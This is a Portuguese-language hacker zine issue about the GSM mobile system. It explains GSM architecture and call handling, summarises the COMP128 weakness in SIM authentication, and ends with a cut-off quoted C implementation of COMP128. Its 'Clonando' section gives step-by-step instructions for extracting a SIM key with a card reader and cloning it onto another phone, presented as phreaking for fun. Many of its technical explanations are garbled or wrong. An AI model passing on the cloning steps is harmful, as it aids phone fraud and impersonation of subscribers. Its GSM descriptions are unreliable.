Shadow (puruca) 	, por nos ceder um espaco onde nos podemos colocar a nossa
			  zine, thanx dude! 
Equipe Microsoftz , Equipe Phineas Network , The Puruca's Web Page , 
			  por nos dar total suporte e ajuda nas nossas pesquisas
E pela total ajuda da gsmworld , nos ajudando a fazer as pesquisas e coletar
					   todas as informacoes necessarias para q o 
				 	   projeto seja terminado com sucesso !
Computer Chaos Club , da Alemanha por nos manter informado sobre o caso do 
			    D2 Pirat , e sobre a falha no GSM em geral!
Obrigado a todos q nos ajudaram neste e/ou em outros projetos!
:>[ GSM systems ]<::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Bem vindo a primeira edicao do Info Seeker , nesta edicao , nos iremos 
tratar de um sistema telefonico celular , q estah sendo constantemente 
mensionado em listas de discuçoes e conferencias , o sistema GSM de celular
é considerado um dos melhores sistemas de celular existente , desenvolvido 
inteiramente para o sistema Europeu de telefonia , o GSM utiliza de varios
dispositivos para desencadear as imensas bibliotecas , funcoes e razoes q 
compoem o GSM .

Ultimamente os dois casos q mais abalaram a fe no sistmea GSM foram as 
falhas descoberta nos algoritmos a3 e a8 de encriptacao de datas do celular 
outro recente bug descoberto foi na industria alema de telecomunicacoes , 
feita pela Computer Chaos Club , toda a documentacao de ambos os casos estao 
dividas entre este info seeker , e a proxima edicao , nao esquecendo da 
cobertura completa do caso na nossa zine!

	       _      
		(_)_ ___/¯¯¯¯)       ____ ___  ___ _  _ ________
  	   	| | '   \  /¯/¯¯¯\  /  __/ - \/ - ' |/ / - \  _ \
		| | |¯| |  ¯¯| 0 |  \__  \ __/\  _| /\ \  _/ _ _/
		|_|_| |_|_|¯¯\___/  |____/\__| \__|_| \_\__|_|\_\
The Global System for Mobiles - Info seeker Revision v0.1

	1) Historia do GSM			   
	2) Servicos providos pelo GSM	         
	3) Arquitetura do sistema GSM          
	   3.1) Estacao Movel		         
	   3.2) ERB					   
	   3.3) Central de Comutacao e Controle
	4) Nomes de mesa do sistema GSM
	5) Processo de ligacao
	6) Routeamento das ligacoes
	7) Codificacao na modulacao GSM
	8) Sistema Codificador de voz
	9) GSM SIM Hack
         9.1) Estrutura de analise
         9.2) A nivel SIM
         9.3) Estudo Criptoanalise tecnico
	   9.4) Clonando... =)
     10) D2 Pirat - CCC
     11) Falhas no algoritimo A5 
     12) Algoritimos A3, A5, A8
     13) GSM celular Programming Archivies
         13.1) Nokia 
     14) Conclusao
=The GSM System=		    I n f o  S e e k e r	      =The GSM System=

1) Historia do GSM

	No ano de 1980 prevalecia a maquinaria americo-germanica no sistema
telefonico celular , um sistema analogico e muito fraco digamos de passagem,
como na Europa ,o mercado era bastante pequeno , o governo e as acoes do 
mercado na indicavam um crescimento e estimulacao de um mercado financeiro
envolvendo o celular , por isso nunca foi dada uma certa signifcancia para o
celular , entao no ano de 1982 a Europa em geral , envolvendo mais 
brutalmente a Alemanha , Franca e United Kingdom , fizeram uma conferencia
e parceria chamada Conference of Europeans Post and Telegraphs (CEPT), 
formando dali um grupo de estudo e de desenvolvimento de uma rede telefonica
celular chamado de Groupe Sp'ecial Mobile (GSM), utilizando como base estas
especificacoes :

	o Qualidade boa em transmissao Datavoz
	o Terminal e servicos baratos
	o Suporte de roaming internacional
	o Habilidade para suportar terminais "cazeiros"
	o Suporte agil em mudancas de codigos de area e implementacao de novos
	  servicos
	o Eficiencia em comutacao
	o compatibilidade com sistema ISDN

	Em 1989 a responsabilidade e caracterisitcas de aplicacoes foram 
transferidas para a Europena Telecommunication Standart Institue (ETSI),
no ano de 1990 foi liberado as especificacoes a nivel ISO sobre o sistema
GSM, a ativacao oficial do primeiro sistema GSM ocorreu em outubro de 1990,
o inicio das transacoes de negocios , compra e venda e criacoes de redes
GSM comecaram no meio de 1991 , no ano de 1993 jah existiam 36 redes GSM ,
em 22 paises , no ano de 1994 exisitma cerca de 110 redes GSM por todo o 
pais, deixando de ser um padrao europeu para passar a ser um padrao mundial
de redes digitais , tbm comecaram a ser implementados servicos como DCS e 
PCS , no outubro de 1997 jah exisitma cerca de 55 milhoes de pessoas 
utilizando ativamente as redes GSM.

2) Servicos providos pelo GSM

	Desde de o inicio , o maior desafio do GSM era , conseguir fazer um
sistema de servicos parecido com o seu concorrente , o ISDN . Embora nao
seja possivel achar nenhuma semelhanca por parte conectiva , entre o ISDN
trabalhando na Banda B com 64 kbps , e os novos padroa GSM.
	O sistema mais basico provido por todas as redes celular , é a 
permissao de alocacoes de ligacoes , sendo transmitidas dentro do fluxo 
digital da rede GSM.
	Outros servicos tbm permitem q o usuario transmita as sua inforacoes
em cerca de 9000 bps , podendo utilizar sistemas como POTS (Plain Old 
Telefone Service), ISDN, Packet Switches Public Data Networks , e CSPDN 
(circuit Switches Publci Data Networks), utilizando protocolo como 
X.25 e X.32 para transmitr as suas datas .
	
Rede Roaming Internacional - GSM possui uma chave autentificadora q permite
q quase qquer celular , possa redirecionar os seus servicos para um rede GSM
mais proxima , com a utilizacao de um Smart-card , existe seguranca o 
suficiente para q as concercionarias GSM possam acreditar na credibilidide e
confianca da rede concercionaria e o dono do celular.

Qualidade de voz melhorada - A qualidade de voz é bastante melhorada devido
aos aspectos de qualidade , de cobertura de area e a melhor protecao e 
transferencia da datavoz , fazendo com q nao exista interferencias fisicas 
ou virtuais na transmissao!

Sistema suporte de ligacao aumentado - Enquanto as outras rede somente 
brincam de celular , GSM pode ter 900 unidades moveis e mesmo assim pode 
fazer e receber 7,200 ligacoes simultaneamente .

Call ID, SMS , LA - Sistema de identificador de chamads ,conhecido como BINA
Short Message System , sistema de transmissao de mensagens de tamanho 
pequeno , Linha Alternativa , podendo utilizar mais de 2 linhas em um mesmo
celular

Seguranca e privacidade contra clone - Embora tenha sido recentemente 
quebrada este é um dos 2 casos de clone constatados em sistema GSM

SIM - sistema de Smartcard personalizado , para tomar conta e processar 
todas as informacoes!

=The GSM System=		    I n f o  S e e k e r	      =The GSM System=
3) Arquitetura do sistema GSM

	O sistema GSM de celular , é composto por varios e varios pequenos 
sistemas para agilizar ainda mais a elocidade e qualidade de comunicacao , 
este pode ser praticamente dividido em 3 partes , uma , quem carrega o 
celular , 2 a ERB ou estacao Radio-Base , e CCC , central de Comutacao e 
Controle , basicamente os mesmos componentes de sempre , sendo q o terceiro
componente é chamado de MSC , Mobile Switching Center .

3.1) Estacao movel 

	A estacao movel , é composta por um assinante do servico e um celular
padrao GSM , consistindo em um equipamento e um smartcard chamado de SIM ,
Subscriber Identity Module , o SIM é ocerebro de toda  entrenha celular 
GSM, ele comando , armazena , encripta , autoriza , envia , passa , lava e 
cozinha quando utilizado , outra mobilidade do GSM é q quando um usuario 
assina um sistema GSM , e compra um celular , existe um smartcard , q é
capaz de ser colocado em quase qquer celular GSM , fazendo com q a 
identidade daquele telefone , passe a ser a do cartao e nao a q estah no
SIM.
	A unidade movel é unicamente identificado pela International Mobile
Equipament Identity (IMEI) e o SIM q contem o International Mobile 
Subscriber Identity (IMSI), utilizando as chaves secretas A3, A8 e A5 , 
todas recentemente quebradas!
	
3.2) ERB

	A ERB é composta por por duas partes basicas , BTS , Base Transciever
Station , a estacao envia os dados, para o assinante , e a BSC , Base 
Station Controller , q controla e recebe as informacoes dos assinantes ,
utilizando um potente radio-link e um protocolo de transferencia , as 
informacoes sao transmitidas para as CCC's .

3.3) Central de Comutacao e Controle

	A Central de maior importancia na CCC é a MSC ou Mobile Switching 
Center, tem o mesmo projeto de um central PSTN e/ou ISDN , e ainda suporta
com facilidade informacoes como registros , autentificacao , locacao , 
servicos utilizados , routeador de ligacao e sistema roaming . Utilizando um
sistema de sinalizacao digital chamado de SS7 , usado para sinalizar os 
trunks e em redes publicas de telecomunicacao convencional!
	HLR e VLR (Home Location Register - Visitant Location Register), 
juntos com o MSC , oferece um sistema de roteamento de ligacoes , e modo 
roaming internacional em GSM. A funcao de routeamento , sera explica mais 
tarde com mais detalhes , por enquanto é bom saber q a HLR e VLR , sao 
meios e sistemas q carregam informacoes devido a sua localizacao , obtendo
constante mudanca de localizacao , algumas informacao mudam!
	O VLR , consiste em armazenar as informacao de quando um usuario viaja
pela extensao e/ou saia dela , existe um dispositivo no celular e no 
routeador q permite a identificacao do usuario em qquer lugar do pais e do
mundo, tbm sao utilizados , o sistema HLR , q ira transmitir automaticamente
para a CCC q o seu celular esta em um lugar tal , ainda dentro da rede GSM
q ele assinou!
	Existe um sistema de mapeamento ao vivo em algumas centrais ISDN e GSM 
embora os mapas fiquem um pouco lotados , tbm existe o conforto dos sistemas
AuC , The Authetification Center, e IMEI e ainda por cima o EIR , Equipament
Identity Register , q é um hardware q fica dentro do celular , enviando 
informacoes confiaveis a CCC , sobre a autentificacao do celular!
=The GSM System=		    I n f o  S e e k e r	      =The GSM System=
4) Nomes de msa do sistema GSM

Sistema de Comutacao , SSS - Q integra o centro de Comutacao e Controle , de
MSC , e que é encarregado de routear as ligacoes e chamadas referentes , e
tbm permite acesso a biblioteca database da rede interna GSM.

HLR - ou Registro de Posicionamento Base de Dados , onde vc guarda 
informacoes relativa a sua posicao em cada erminal da rede GSM. \

VLR - ou Registro Visitante , aloja todos os dados relativos a terminal 
alheios q prestam servico roaming por meio de convenio !

AuC - Autentification Center, nele sao gerados constantementes os novos 
codigos  necessarios para a seguranca de acesso a rede e do celular em geral

EIR - Ou Registro Identificativo de Equipamentos. Consiste no armazenamento
de todas as identificacoes dos terminais moveis q estao activos na rede

O conjunto Estacao radio-base - BSS , conrespondem ao equipamento mais comum
de todas as celulas q compoem as rede  de cobertura de um sistema (ERB) e 
consta dos seguintes componentes:

BTS ou Estao Base Transceptora, consta de todos os elementos necessarios 
para fornecer o trafego de radio de uma celular. Segundo oas especificacoes,
GSM , as BTSs tem uma identidasde propria dentro da rede 
(CI - Cell Identity), mas srgundo o sistema radiante adoptado pode dar a 
cobertura maior a celula!

BSC - Ou Controle para Estacao Radio-base . é um cerebro q gera e supervisa
o trafego de celulas ou BTS, coordenando as operacoes de mudanca de celula,
(handover) para alem de servir de interface a distribuicao do trafego gerado
pela celula , para a sua integracao atravez da rede.

OMC (Centro de Operacoes e Manutencao) - é o elemento de controle central 
da rede q gera e direcciona o trafego , supervisa todos os elementos que 
compoem a rede e efetua tarefas de verificacao e manutencao de qualidade na
rede, fundamental no complexo ambiente de transmissao de dados!

=The GSM System=		    I n f o  S e e k e r	      =The GSM System=
5) Processamento de ligacao 

	Sabendo os componente existentes a originacao de ligacoes é bem facil
de ser descrita veja como ela é originada!

1) Liga-se o celular
2) Checagem de potencia do sinal
3) Enviados um batelada de codigos e algoritmos descritos no jargon
4) Enviado verificacao de ESN , MIN e autentificacao de codigo a3, a8 e a5
5) Autorizacao de uso de celular na rede
6) Estabelecimento de link entre ERB e unidade Movel
7) Nova checagem de sinal
8) Estabelicimento de alocacao
9) Checagem de localizacao , verificando se esta em modo roaming ou nao
10) Digitado no pad o numero do telefone
11) Checasse mais uma vez a ESN , MIN e autentificacao de codigo a3 ,a8 , a5
12) Apertada a tecla (SND)
13) Estabelecimento de link é aumentado
14) Transmissao de celulas
15) Espera de captacao do sinal por parte da ERB
16) ERB encaminha as informacoes para a CCC
17) CCC comuta e mastiga e cospoe as informacoes enviadas e processa a 
    ligacao
18) Procura o codigo do estado referente , localizado
19) Procura o codigo de area referente , localizado
20) Procura os ultimos 4 digitos na central , localizado
21) Resposta da CCC para ERB e da ERB para a unidade Movel , telefone 
    chamando
22) Atende alguem , criado link entre unidade Movel -> ERB -> CCC -> Rede
    Telefonica -> Linha telefonica
23) é criado o link inverso , comeca um ciclo de transmissao , ligacao 
    completada!

6) Routeamento das ligacoes

	Ao contrario do soutros sistemas , o usuario GSM , pode ter o seu 
telefone disponivel facilmente a nivel de ligacao direta internacional , 
outros tipos de terminais , nao aceitam este tipo de sistema , pelo simples
fato de q os terminais estao ligados por meio de cabos e fios até a rede
telefonica convencional , fazendo com q a capcidade de extensao tenha muito 
mais haver com a parte fisica , do q algum problema virtual de obstrucao ou
qquer outra coisa. O diretorio e sistema de numeracao eletronica (MIN) do 
GSM é chamada de MSISDN (Mobile Subscriber ISDN), q é definida pelo plano
de numeramento E.164.
	O planeamento é bem basico , o numero completo ''e composto por um 
gateway terminal , q automaticamente acrescenta o codigo do pais e do estado
de onde esta o assinante , assim q o pedido de ligacao entra na rede GSM,
fazendo com q o numero seja algo como um numero universal.
	O sistema de alocacao e terminal de ligacao é chamado de GMSC , ou 
Gateway Mobile Switching System, o GMSC é basicamente uma central q é
capaz de se comunicar com o terminal SIM do celular , fazendo questoes 
visando a autentificacao real do celular, utilizando uma mesa de 
transferencia com o sistema MSISDN. A Informacao q retorna por meio de GMSC,
na maioria das é o MSRN , Mobile Station Roaming Number , q tbm é 
descrevido no palno de numero E.164 . O MSRN é um numero relacionado 
geograficamente com o celular !
	O procedimento mais comum de routeamento comeca assim :

1) Criado um link entre o sistema GMSC e o celular
2) comecasse a questionacao da autentificacao do celular
3) autentificacao concedida
4) Ligacao transferida para o plano numerico E.164
5) Questionamento se ele esta em modo HLR ou VLR
6) Procura de unidade movel no mapeamento da rede
7) Autorizacao concebida
8) O numero jah esta routeado nos computadores , a ligacao pode ser feita
   a qquer momento agora!

=The GSM System=		    I n f o  S e e k e r	      =The GSM System=
7) Codificacao na modulacao GSM

	Para melhorar mais a eficiencia do ambiente GSM, o sucessivo metodo de
codificacao elevam o rendimento e a protecao contra as inumeras adversidades
as quais pode estar submetida a ligacao por celular. Para isto utilizasse
um sistema fortissimo de encriptacao algoritimica de chaves e codigos 
secretos, necessarios para a autentificacao certeira do celular. 
	Efetivamente , um sistema Corretor Directo de Erros (FEC, Forward Erro
Correction)necessita de dispor de certa informacao complementar para q o 
uso do celular seja autorizado , fazendo diversas contas matematicas 
cabeludas, baseado em um sistema chamado de Contagem Redundante Ciclica
(CRC) para poder calcular o valor original dos bits necessarios , em tempo
real!

	Todos os diferentes sistemas FEC tem um limite de atuacao dependendo
da informacao redundante a ser calculada, isto é,  existe um limite maximo 
de correcoes permitidas.
	O Compromisso esta em dimensionar que a informqacao redundante seja 
pouca,(a informacao adcional chama-se Overhead)para sobrecarregar o menos 
possivel a trama de informacoes util. mas q este seja sufieciente para a 
correco seja geita com 99% de acertos , deixando uma pequena proporcao para
o erro!
	No caso da codificacao usada no GSM, o OverHead , é muito alto , 
quase da ordem de 50%, isto é , quase a metade da informacao enviada é
informacao redundante , reservada para q o sistema FEC atue dentro das 
margens estipuladas para q nao haja baixa de rendimento durante a correcao!
	(De uma forma util de 13Kbit/seg. é gerada uma trama "Protegida 
contra erros" de 22Kbit/s., q é a velocidade total resultante no sistema
GSM)
	para alem de todo este sistema de correcao de erros directa , o 
sistema de codificacao GSM utiliza tbm tecnicas de "sobreoposicao" ou 
Interleaving. Este sistema consiste em distribuir a informaao atravez de 
varias rajadas (burst), efetuando uma colocacao especial do bits ao longo 
da trama (mapeamento)para evitar q a infomacao util viaje de form 
consecutiva. Isto permite evitar o transbordamento ou flood do limite FEC de
tolerancia maxima, ao referiamos antes!

8) Sistema Codificador de voz

	Este é outro aspecto fundamental no funcionamento segudo do GSM,com a
utilizacao das mais modernas tecnicas de compressao de voz, inclundo as 
chamadas tecnicas de predicao da forma de onda, efetua-se um processamento
do espectro de frequencias que compoem a conservacao, para poder codificar a
data/voz a velocidade de 13Kbits.
	O VoiceCoder ou Vocoder empregado denomina-se LPC/LTP/RPE (Linear 
Predictive Coder/LogTerm Predictor/Regular Pulse Excitation) e sintetiza
nas suas especificacoes toda a tecnologia em materia de compreensao e 
conversacao analogico-digital inteligente. Inclui um sistema q detecta
pausas duraten a conversacao , Detector de Atividade Vocal ou VAD , q gera 
um Confort Noise ou ruido de fundo confortavel no terminal do outro ouvinte,
o q permite uma imensa poupanca de baterias , e fica assim ateh q VAD 
perceba q a fala voltou!
	O codificador de voz , a base de efetuar amos de som em segmentos 
de duracao de 20mseg., realiza a conversasao em palavras digitais de 260 
bits e compoe a trama final de 13kbit;s q contem toda a informacao 
necessaria para q os sons sejam reproduzidos no destino com uma qualidade
aceitavel!
	De resto soh o fato de ter conseguido enviar o conteudo de uma 
conversasao em so 13kbit's define a sofisitcacao tecnologica de transporte
no sistema GSM.
	o resultado final depois do grande diversidade de tecnologia envolvida
é q as ligacoes estao dotadas para serem estabelecidas e darem um bom 
servico na maioria das condicoes de baixa qualidade que se podem verificar 
em sistemas moveis, cumprindo perfeitamente a funcao para qual o sistema
GSM foi criado!

=The GSM System=		    I n f o  S e e k e r	      =The GSM System=
9) GSM SIM Hack

	 A menos de um mes , membros da Smartcard Developers Association e 
do time ISAAC da Berkeley Institutes , descobriram uma falha imensa no 
algoritimo de encriptacao do cartao SIM , q é um smartcard existente dentro
do celular para sistemas GSM. O ataque explora uma falha de preenchimento 
por parte dos criadores do algoritimo de encriptacao A3 e A8 , alvos do 
ataque mencionado!
	 
9.1) Estrutura de analise

	O ataque é um sistema fisico virtual , desenvolvido por parte da SDA,
o sistema consistiu em um hardware q compreende as linguagem (ATR) dos Smart
Cards , tbm foi usado um programa betaware feito pela ISAAC , q entrava as
tentativas de acerto para q junto com os algoritimos pudessem ir por meio de 
um ataque sequencial numerico , advinhar um valor positivo dentro das 
equacoes criptograficas do algoritimo
	Usou-se um celular habilitado em sistema GSM (o preco , era um Nokia 
8021, cerca de 700 reais), o custo da rede GSM para a inscricao e 
habilitacao foi cerca de 100 dolares, com um celular habilitado , os 
tecnicos da SmartCard Developers Association , pegaram o seu cartao 
smartcard e o conectaram ao sistema de leitora smartcard , e encaixando a 
outra ponta , no conector do cartao no telefone celular , inicializou o 
programa (q esta a disposicao neste Info seeker e no nosso site 
www.puruca.com.br/phone9/), depois de ligar o laptop e inicializar o 
programa comecaram a decifrar o codigo por meio de tentativas sucessivas , 
o ataque demorou cerca de 8horas consecutivas , levado em consideracao de q
o ataque ativa o smartcard 150.000 vezes ,  levando em conta de q o 
aparelho utilizado para ler o smartcard por processar 6.25 sequencias 
numericas por segundo. Agora faca as contas e calcule o tempo de nao demorou
para descobrir uma unica chave!

9.2) A nivel SIM

	O GSM utiliza como vcs jah devem saber , um sofisitcado dispositivo de
smart-card , para coordenar as suas acoes e informacoes dentro da memoria do
proprio celular. O principal motivo de um sistema SIM no GSM , era o de 
sofisticar o meio de seguranca contra clones no celular , o SIM possui 
grande quantidade de chaves criptograficas , q fazem boa parte da seguranca
durante as transferencias em Smartcards!
	O sistemas de transporte é bastante simples e comum em redes 
celulares . O protocolo MS (Mobile Subscriber), e para acessar o sistema uma
rede de gateway celular , chamada de RAND. Os computadores MS anotam qquer
chamada para aquele gateway , usando um encriptacao de one-way com o codigo
A3 . Sobre o controle do gateway , o assinante reporta para o computador a
chave Ki. A chave Ki é unicamente utilizada por um usuario (ou pelo menos
deveria), q soh é visualizada por dois sistemas , o assinante e a rede 
consercionaria GSM. O valor SRES na computacao de transferencia MS é 
especificado por meio de uma sinalizacao a rede GSM, q é comparada com uma
parte da chave pre-padrao armazenada e estipulada pela rede, se os dois 
valores das chaves SRES forem compativeis , entao o usuario foi 
autentificado, dando a permissao para ligacoes!
	O mesmo mecanismo é utilizado para estabilizar a chave Kc , para 
encriptar,o usuario e a transmissao sinalizada de radio-frequencia , este
procedimento é chamado de "Cipher Key Setting". A chave é computada no 
MS usando um sistema de encriptacao one-way (semelhante ao do passwd no 
unix3s!)para a chave de encriptacao A8, sobre o controle do gateway , sao 
autentificadas as chaves Ki , comparada com a parte jah existente , existe
um acordo criptografico e a ligacao é permitida!
	Na pratica , as duas funcoes A3 e A8 sao compiladas e armazenadas em
um unico algoritimo , chamado de A38 , q ''e simultaneamente utilizado pelo
computador SRES e a chave Kc da RAND e Ki!
	Basicamente esta é a seguranca q exerce o Smartcard, quanto a 
autentificacao do celular , de uma forma valida e completamente simples , 
mas ainda existem varios sistemas q serao descritos talvez em outro 
info-seeker!

9.3) Estudo Criptoanalise tecnico

	O ataque explorar uma falta de difusao no codigo , existe um caminho
muito estreito para se canalizar dentro do COMP128 , em particular , bytes
i,i+8,i+16,i+24 , no output dependem somente de bytes i,i+8,i+16,i+24 do 
input para COMP128 . Bytes i,i+8do COMP128 , e byte i,i+8 sao input da chave
e bytes i,i+16,i+24 do COMP128 , sao bytes i,i+8 para o tentativa sequencial
de numeros
	Agora nos testes feitos ,verificando os bytes i,i+16,i+24 do input 
COMP128 , e segurando o resto dos inputs , levando em consideracao de q os
bytes sao nao-objetivos , é possivel q aconteca uma colisao no bytes 
i,i+8,i+16,i+24 durante o round do OUTPUT , teorica e praticamente 
acontecera esta colisao de bytes bem rapidamente , sendo q o pipi é de 
somente 4 bits longo. Colisoes dentro do narrow pipe , podem ser percebidas,
pq o seu ouput saira direto , dentro do COMP128, em cada colisao , pode ser 
q dois bytes i,i+8 possam ser descobertos.
	Como jah especificado , isto iria precisar 2^{4*7/2 + 0.5} = 2^{14.5} 
como um input-advinhado , questionado ao COMP128 `para tentar verificar a 
autentificacao de dois bytes qquer , e isto iria questionar ao  
8*2^{14.5} = 2^{17.5} , até q sejam cobertos de numeros validos toda a
chave de 128-bits.

9.4) Clonando... =)

	O ato de clonar o celular é bastante simples neste caso , algumas
consideracoes devem ser tomadas , e outros detalhes tbm devem ter sido 
devidamente checados , do resto é somente phreak 4 phun!

Consideracoes :

Nao é possivel se clonar um smartcard ou obter a sua chave , por tecnicas
q captam as ondas do celular ou central por ar , nao existe , até hoje , 
uma tecnologia q consiga interceptar tal canal de transferencia!

O acesso tem q ser totalmente fisico , e até hoje soh se foi possivel se
quebrar a chave tendo acesso fisico ao smartcard do celular (SIM)

A chave q vc ira quebrar , é a chave do seu celular (o qual vc tem acesso 
ao SIM), caso vc queira literalmente clonar , vc tera q quebrar a chave de
outro celular e reestaura-la novamente , desta vez para a chave de outro 
celular

<:Cloning:>

	Primero , é necessario uma Leitora de smartcard , e o programa GSM 
hack (disponivel no GSM HacK Packet), depois de fazer a leitora de 
smartcard, coloque o smartcard dentro dos dois extensores da leitora e 
plugue a outra ponta no conector de cartoes smartcard do celular, depois de
feito tudo isto , inicie o programa.
	Siga as intrucoes do programa (algo um tanto obvio não?), depois q 
comecar a fazer o ataque deixe rolar e espere até q o programa apite , vc 
quebrou parte da chave ou a chave completa!

Boa sorte!

Para clonar efetivamente o celular , faca isto em outro celular GSM , soh q
desta vez ao invez de manter o codigo , mude-o , o programa lhe oferece esta
opcao!

=The GSM System=		    I n f o  S e e k e r	      =The GSM System=
10) D2 Pirat - Computer Chaos Club

	O grupo alemao bastante conhecido , Computer Chaos Club (CCC), 
descobriu poucos dias depois da falha em GSM ser descoberta , a falha 
imensa, q o grupo descobriu , no sistema alemao de telecomunicacao , q vale 
como informacao w4r para nos podermos brincar um pouco com o sistema GSM 
em geral!

Acesse: www.puruca.com.br/phone9/d2.htm e veja o documento, em alemao!
							[ Desculpe, mas eu nao vou ] 
							  [ traduzir texto algum! ]

=The GSM System=		    I n f o  S e e k e r	      =The GSM System=
11) Falhas no algoritimo A5

11.1) FAQ

Eu resolvi escrever este texto em forma de FAQ , se ninguem se importar , eu
nao ligo se vc se importa ou nao , ai vai o pequeno FAQ.

1) O q eh A5 ?

	Eh um algoritimo de encriptacao de dados em sistemas Global System for
Mobiles (GSM).

2) O q ele faz ?

	A chave criptografica , encripta a transmissao aerea entre o usuario
movel e a central,  a chave eh originada de uma juncao assim :

[A5 - A1] ou [A5 - A2 + A8 + Hora local onde a rede GSMnica esta]

	Exceto as autoridades governamentais , ninguem mais eh capaz de 
interceptar a transmissoes GSM. Depois do codigo BSC , a conversacao entre
a central e o usuario se torna praticamente inexistente! Existem tbm , 
algumas pessoas q afirma conseguir interceptar transmissoes IMSI por 
via-aerea , mas nada eh documentado ou muito menos ensinado.

	Ate hoje eh conhecimento da GSMworld (GSM MoU), o monitoramento de 
celulares GSM eh algo muito remoto , q nao se baseia em partes do sistema e
nem e partes do usuario movel , simplesmente constituidos de ideias na 
maioria das vezes sem fundamentos , q podem chegar a dar certo por um puro
acasso , mesmo assim seria bem dificil se quebrar o codigo A5!

3) Fatos A5 concretos!

	O COMP128 , e composto por dois algoritimos , o A3 , utilizado para a
autentificacao e o A8 , utilizado na para criar o algoritimo!

	O algoritimo A8 utiliza um output de 64 bits , os criadores deste 
codigo preencheram de data util 54 bits do codigo , os outros 10 bits do 
codigo foram preenchidos com 0 , este 0 originaram a maior parte do ataque , 
substituindo valores neutros , por valores q conseguiriam obter pedacoes da 
chave parte por parte , durante cerca de 6 a 12 horas de ataque!

	Jah existe metodos concretos ( e utilizados =)) de como se obter 
extractar para o output , utilizando estes 10 bits como retorno da sua 
resposta .

	Um atacante depois dos algoritimo A2 e A4 , jaqh pode conseguir 
determinar a chave criptografica voz , do A5 , se ele alem de obter as 
respostas positivas do A2/A4e tiver a chave interna Ki do SIM !
	
	Sabendo a resposta da chave criptografica do algoritimo A5 , eh 
possivel se desencriptar a data-voz transmitida pelo celular!

4) Alguem jah colocou a mao no algoritimo A5?

	Muitos afirmam , jah terem colocado sa maos neste algoritimo , mas 
ninguem nunca os apresentou de forma esxplicita na net , jah fizeram 
implementacoes , teorias supostas e partes importantes da chave (caso do 
ISAAC) , mas q de certa forma , o algoritimo efetivo nunca foi liberado e 
ainda eh algo um tanto misterioso!
=The GSM System=		    I n f o  S e e k e r	      =The GSM System=
12) Algoritimos A3,A5,A8 

<::::::::::::::::::[A3A8]::::::::::::::::::::::::::::::::::::::::::::::::::>
\\ As melhores q eu consegui achar , mas mesmo assim , ainda eh uma mera 
implementacao , mas jah da para brinca! //

/* An implementation of the GSM A3A8 algorithm.  (Specifically, COMP128.) 
 */

/* Copyright 1998, Marc Briceno, Ian Goldberg, and David Wagner.
 * All rights reserved.
 */

/*
 * For expository purposes only.  Coded in C merely because C is a much
 * more precise, concise form of expression for these purposes.  See Judge
 * Patel if you have any problems with this...
 * Of course, it's only authentication, so it should be exportable for the
 * usual boring reasons.
 */

typedef unsigned char Byte;

#include 
/* #define TEST */
 
/*
 * rand[0..15]: the challenge from the base station
 * key[0..15]: the SIM's A3/A8 long-term key Ki
 * simoutput[0..11]: what you'd get back if you fed rand and key to a real
 * SIM.
 *
 *   The GSM spec states that simoutput[0..3] is SRES,
 *   and simoutput[4..11] is Kc (the A5 session key).
 *   (See GSM 11.11, Section 8.16.  See also the leaked document
 *   referenced below.)
 *   Note that Kc is bits 74..127 of the COMP128 output, followed by 10
 *   zeros.
 *   In other words, A5 is keyed with only 54 bits of entropy. This
 *   represents a deliberate weakening of the key used for voice privacy
 *   by a factor of over 1000.
 * 
 * Verified with a Pacific Bell Schlumberger SIM.  Your mileage may vary.
 *
 * Marc Briceno , Ian Goldberg ,
 * and David Wagner 
 */

void A3A8(/* in */ Byte rand[16], /* in */ Byte key[16],
	/* out */ Byte simoutput[12]);

/* The compression tables. */
static const Byte table_0[512] = {
        102,177,186,162,  2,156,112, 75, 55, 25,  8, 12,251,193,246,188,
        109,213,151, 53, 42, 79,191,115,233,242,164,223,209,148,108,161,
        252, 37,244, 47, 64,211,  6,237,185,160,139,113, 76,138, 59, 70,
         67, 26, 13,157, 63,179,221, 30,214, 36,166, 69,152,124,207,116,
        247,194, 41, 84, 71,  1, 49, 14, 95, 35,169, 21, 96, 78,215,225,
        182,243, 28, 92,201,118,  4, 74,248,128, 17, 11,146,132,245, 48,
        149, 90,120, 39, 87,230,106,232,175, 19,126,190,202,141,137,176,
        250, 27,101, 40,219,227, 58, 20, 51,178, 98,216,140, 22, 32,121,
         61,103,203, 72, 29,110, 85,212,180,204,150,183, 15, 66,172,196,
         56,197,158,  0,100, 45,153,  7,144,222,163,167, 60,135,210,231,
        174,165, 38,249,224, 34,220,229,217,208,241, 68,206,189,125,255,
        239, 54,168, 89,123,122, 73,145,117,234,143, 99,129,200,192, 82,
        104,170,136,235, 93, 81,205,173,236, 94,105, 52, 46,228,198,  5,
         57,254, 97,155,142,133,199,171,187, 50, 65,181,127,107,147,226,
        184,218,131, 33, 77, 86, 31, 44, 88, 62,238, 18, 24, 43,154, 23,
         80,159,134,111,  9,114,  3, 91, 16,130, 83, 10,195,240,253,119,
        177,102,162,186,156,  2, 75,112, 25, 55, 12,  8,193,251,188,246,
        213,109, 53,151, 79, 42,115,191,242,233,223,164,148,209,161,108,
         37,252, 47,244,211, 64,237,  6,160,185,113,139,138, 76, 70, 59,
         26, 67,157, 13,179, 63, 30,221, 36,214, 69,166,124,152,116,207,
        194,247, 84, 41,  1, 71, 14, 49, 35, 95, 21,169, 78, 96,225,215,
        243,182, 92, 28,118,201, 74,  4,128,248, 11, 17,132,146, 48,245,
         90,149, 39,120,230, 87,232,106, 19,175,190,126,141,202,176,137,
         27,250, 40,101,227,219, 20, 58,178, 51,216, 98, 22,140,121, 32,
        103, 61, 72,203,110, 29,212, 85,204,180,183,150, 66, 15,196,172,
        197, 56,  0,158, 45,100,  7,153,222,144,167,163,135, 60,231,210,
        165,174,249, 38, 34,224,229,220,208,217, 68,241,189,206,255,125,
         54,239, 89,168,122,123,145, 73,234,117, 99,143,200,129, 82,192,
        170,104,235,136, 81, 93,173,205, 94,236, 52,105,228, 46,  5,198,
        254, 57,155, 97,133,142,171,199, 50,187,181, 65,107,127,226,147,
        218,184, 33,131, 86, 77, 44, 31, 62, 88, 18,238, 43, 24, 23,154,
        159, 80,111,134,114,  9, 91,  3,130, 16, 10, 83,240,195,119,253
    }, table_1[256] = {
         19, 11, 80,114, 43,  1, 69, 94, 39, 18,127,117, 97,  3, 85, 43,
         27,124, 70, 83, 47, 71, 63, 10, 47, 89, 79,  4, 14, 59, 11,  5,
         35,107,103, 68, 21, 86, 36, 91, 85,126, 32, 50,109, 94,120,  6,
         53, 79, 28, 45, 99, 95, 41, 34, 88, 68, 93, 55,110,125,105, 20,
